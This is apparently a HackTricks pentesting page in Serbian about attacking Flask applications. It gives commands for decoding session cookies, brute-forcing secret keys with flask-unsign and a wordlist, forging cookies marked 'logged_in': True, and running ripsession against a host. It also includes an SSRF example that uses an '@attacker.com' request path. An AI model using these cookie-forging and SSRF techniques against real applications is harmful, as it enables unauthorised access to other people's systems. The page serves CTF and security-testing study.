Flask

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Use Trickest to easily build and automate workflows powered by the world's most advanced community tools. Get Access Today:

Automate OffSec, EASM, and Custom Security Processes | Trickest

Verovatno, ako igrate CTF, aplikacija zasnovana na Flask-u će biti povezana sa SSTI.

Cookies

Podrazumevano ime sesije kolačića je session.

Decoder

Online Flask dekoder kolačića: https://www.kirsle.net/wizards/flask-session.cgi

Manual

Uzmi prvi deo kolačića do prve tačke i dekodiraj ga u Base64.

echo "ImhlbGxvIg" | base64 -d

Kolačić je takođe potpisan korišćenjem lozinke

Flask-Unsign

Alat za komandnu liniju za preuzimanje, dekodiranje, brute-force i kreiranje sesijskih kolačića Flask aplikacije pogađanjem tajnih ključeva.

flask-unsignPyPI

pip3 install flask-unsign

Dekodiraj Kolačić

flask-unsign --decode --cookie 'eyJsb2dnZWRfaW4iOmZhbHNlfQ.XDuWxQ.E2Pyb6x3w-NODuflHoGnZOEpbH8'

Brute Force

flask-unsign --wordlist /usr/share/wordlists/rockyou.txt --unsign --cookie '<cookie>' --no-literal-eval

Potpisivanje

flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME'

Potpisivanje korišćenjem legacijske (stare verzije)

flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME' --legacy

RIPsession

Alat za komandnu liniju za brute-force napade na veb sajtove koristeći kolačiće kreirane sa flask-unsign.

GitHub - Tagvi/ripsession: A command line tool to brute-force websites using cookies crafted with flask-unsign.GitHub

ripsession -u 10.10.11.100 -c "{'logged_in': True, 'username': 'changeMe'}" -s password123 -f "user doesn't exist" -w wordlist.txt

SQLi u Flask sesionom kolačiću sa SQLmap

Ovaj primer koristi sqlmap eval opciju da automatski potpiše sqlmap payload-e za flask koristeći poznatu tajnu.

Flask Proxy za SSRF

U ovom izveštaju objašnjeno je kako Flask omogućava zahtev koji počinje sa karakterom "@":

GET @/ HTTP/1.1
Host: target.com
Connection: close

Koji od sledećih scenarija:

from flask import Flask
from requests import get

app = Flask('__main__')
SITE_NAME = 'https://google.com/'

@app.route('/', defaults={'path': ''})
@app.route('/<path:path>')
def proxy(path):
return get(f'{SITE_NAME}{path}').content

app.run(host='0.0.0.0', port=8080)

Može omogućiti uvođenje nečega poput "@attacker.com" kako bi izazvao SSRF.

Koristite Trickest za lako kreiranje i automatizaciju radnih tokova pokretanih najnaprednijim alatima zajednice na svetu. Pribavite pristup danas:

Automate OffSec, EASM, and Custom Security Processes | Trickest

Podržite HackTricks

Proverite planove pretplate!
Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.

PreviousElectron contextIsolation RCE via IPC NextNodeJS Express

Last updated 4 months ago